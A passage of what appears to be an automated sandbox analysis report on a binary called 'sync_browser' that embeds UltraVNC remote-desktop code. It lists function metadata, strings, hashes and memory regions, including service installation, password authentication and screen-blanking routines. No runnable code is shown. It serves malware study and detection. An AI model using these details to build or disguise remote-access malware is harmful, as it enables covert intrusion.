                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
                                                                    • String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
                                                                    • API String ID: 3991686958-188493154
                                                                    • Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                    • Instruction ID: c25ad7055bdd84ef675950bbb3d0a393b61e9bc12948191b3e7819df350d33b1
                                                                    • Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                    • Instruction Fuzzy Hash: 17B1BD32B0C682D5EB04FB75D8502FDA361EB84B58F844636DA1E47BEADE38E505C360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID:
                                                                    • API String ID: 2853843867-0
                                                                    • Opcode ID: 738010315c4fbe66759cf3f0748f0b1c3343dfd492cab0107882c60a7f806e67
                                                                    • Instruction ID: d70c1fd71abf4e27183403b0d9224e0153f8dc042ec4820ebf0bd8026fa47146
                                                                    • Opcode Fuzzy Hash: 738010315c4fbe66759cf3f0748f0b1c3343dfd492cab0107882c60a7f806e67
                                                                    • Instruction Fuzzy Hash: 4BE1C432A1CA91C6EB10FB66E4406BDB7A1FB88B84F845035EE4D57B68DF39E441CB50
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF740016A0B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF740016A39
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7400169A4
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF74001695B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF740016BB2
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7400169F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction ID: 4b84a2f1078d7e769836cec188482daf687d4d8d6a45aa5e22e05d0adb4e4c70
                                                                    • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction Fuzzy Hash: 85613962A1C5D2C1E729BB25E8553B9B390EF44344FC4503AEA4E4B7A5EE3DF505C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
                                                                    • String ID: blackscreen
                                                                    • API String ID: 1419467151-1520931032
                                                                    • Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                    • Instruction ID: eceaced41e8ed62512f95dc4b7ff342f40f2a435034608b09ba04ea2fc2afa3b
                                                                    • Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                    • Instruction Fuzzy Hash: 58815E72A0D682C2FB61BB24F4406BAA690BF85784FC90535CA5D067AADF2DF540C735
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterInvalidateRect
                                                                    • String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
                                                                    • API String ID: 3829719269-2763606790
                                                                    • Opcode ID: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
                                                                    • Instruction ID: d6e14850dae2c6b37c56c81d2c41d2b3004cae6aced4ee227123048b776b92f2
                                                                    • Opcode Fuzzy Hash: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
                                                                    • Instruction Fuzzy Hash: 74717C76A0CA82C6E755FF25D4006E9B3A4FB88F44F884432DA0D5B3A8CF38B505CB20
                                                                    APIs
                                                                      • Part of subcall function 00007FF740012FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF740013009
                                                                      • Part of subcall function 00007FF740012FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF740013041
                                                                    • OpenSCManagerA.ADVAPI32 ref: 00007FF740012D23
                                                                    • CreateServiceA.ADVAPI32 ref: 00007FF740012DB6
                                                                    • GetLastError.KERNEL32 ref: 00007FF740012DC4
                                                                    • CloseServiceHandle.ADVAPI32 ref: 00007FF740012DFB
                                                                      • Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
                                                                      • Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
                                                                      • Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
                                                                      • Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
                                                                      • Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
                                                                      • Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
                                                                      • Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
                                                                    • String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
                                                                    • API String ID: 1695331641-1004021400
                                                                    • Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                    • Instruction ID: 193bbbb7ad9de8ff1b4c87fbaa28cc5bd2cd739e910b79c815294fdd103a9e68
                                                                    • Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                    • Instruction Fuzzy Hash: 64314871A0CA86C6EB11BB10F8402B9A3A1FF48744F940035DA9D46B79EF7DF599CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
                                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                    • API String ID: 1846935786-1174184736
                                                                    • Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                    • Instruction ID: df970386100ae39f27e5977382db2cb1ebf2775b7f97fb12652527b5198ff0a2
                                                                    • Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                    • Instruction Fuzzy Hash: 48313025A0DA82D5EB70BB21B8547AAA3A0FF89744FC41135DA4D5776CDF3CE005C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: rand$Time_getptd$FileSystem
                                                                    • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                    • API String ID: 3485648590-3000200491
                                                                    • Opcode ID: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
                                                                    • Instruction ID: 1aa7a12d240a0f07ea60d68f37d81fbb502ebaf75fe40f3d010e4f00ec31d679
                                                                    • Opcode Fuzzy Hash: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
                                                                    • Instruction Fuzzy Hash: DCF11A52B1D3D58AEB11E7BA64102FDBFA09B42785F944076DF9D1BBAADD2CE100C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                    • String ID: ($DISPLAY$\background.bmp
                                                                    • API String ID: 3125945695-1422902838
                                                                    • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                    • Instruction ID: 62132e9541c445a681cc4287465795d35838cc48b9bb123c6e21f3aefe8fcbe6
                                                                    • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                    • Instruction Fuzzy Hash: 9041523561CB81C6E760AB54F85476AB3A0FB89794FC01235DA9D03BA8DF3CE1058B10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 2183313154-4022980321
                                                                    • Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                    • Instruction ID: 24611670bffdf17e44f0fc08c03ad2a0226c00a4221dfffa158f94c7543ca757
                                                                    • Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                    • Instruction Fuzzy Hash: BD519031A1C642C2F768FB25A4116BAA291FF85784FD44135EE5D42BADCF3CF5068624
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                    • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                    • API String ID: 771632046-3493897170
                                                                    • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                    • Instruction ID: 32d05ea7f72ca54ad8316e73cd249fa015e95e4756af7cab4ab4c912428654c6
                                                                    • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                    • Instruction Fuzzy Hash: 9E311C36A1CA86C2EA60FB20F4557AAB3A0FB89744FC01135E68D42768DF3DE505CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 429868813-3977938048
                                                                    • Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                    • Instruction ID: 6315e8d52537eb80fdae593fe0430dda5d0031cec9b0e6b003acdf07b1b44da7
